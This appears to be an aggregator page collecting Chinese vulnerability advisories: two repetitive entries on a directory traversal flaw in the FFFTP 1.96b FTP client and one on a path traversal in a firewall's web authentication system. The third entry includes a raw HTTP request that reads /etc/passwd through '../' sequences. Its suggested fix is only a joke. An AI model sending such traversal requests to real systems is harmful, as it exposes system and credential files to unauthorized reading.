【导语】“阿卟”通过精心收集,向本站投稿了3篇FFFtp目录遍历漏洞可向任意位置写文件,以下是小编为大家整理后的FFFtp目录遍历漏洞可向任意位置写文件,欢迎参阅,希望可以帮助到有需要的朋友。
篇1:FFFtp目录遍历漏洞可向任意位置写文件
又一款出现目录遍历的ftp客户端
FFFTP是一款小型的FTP客户端软件,FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。
受影响系统:
Jun Sota FFFTP 1.96b
描述:
FFFTP是一款小型的FTP客户端软件,
FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。
建议:
厂商补丁:
Jun Sota
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www2.biglobe.ne.jp/~sota/ffftp-e.html
篇2:FTP客户端目录遍历漏洞可向任意位置写文件
FFFTP是一款小型的FTP客户端软件,FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。受影响系
FFFTP是一款小型的FTP客户端软件。FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件,受影响系统:Jun Sota FFFTP 1.96b描述:FFFTP是一款小型的FTP客户端软件。FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。建议:厂商补丁:Jun Sota目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:www2.biglobe.ne.jp/~sota/ffftp-e.html篇3:安氏领信防火墙web认证系统任意文件遍历漏洞
/cgi-bin/css/遍历系统任意文件
GET /cgi-bin/css/../../../../../../../../etc/passwd HTTP/1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Content-Length: 2
修复方案:
找安氏的黑阔们,
安氏领信防火墙web认证系统任意文件遍历漏洞
,
★ 漏洞Sun Solaris AT 指令可删除任意系统文件
★ ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警
★ [转载 命令]FreeBSD 文件和目录查找Unix系统
★ Nginx %00空字节执行任意代码(php)漏洞漏洞预警
★ 目录范本
★ phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警
FFFtp目录遍历漏洞可向任意位置写文件(精选3篇)
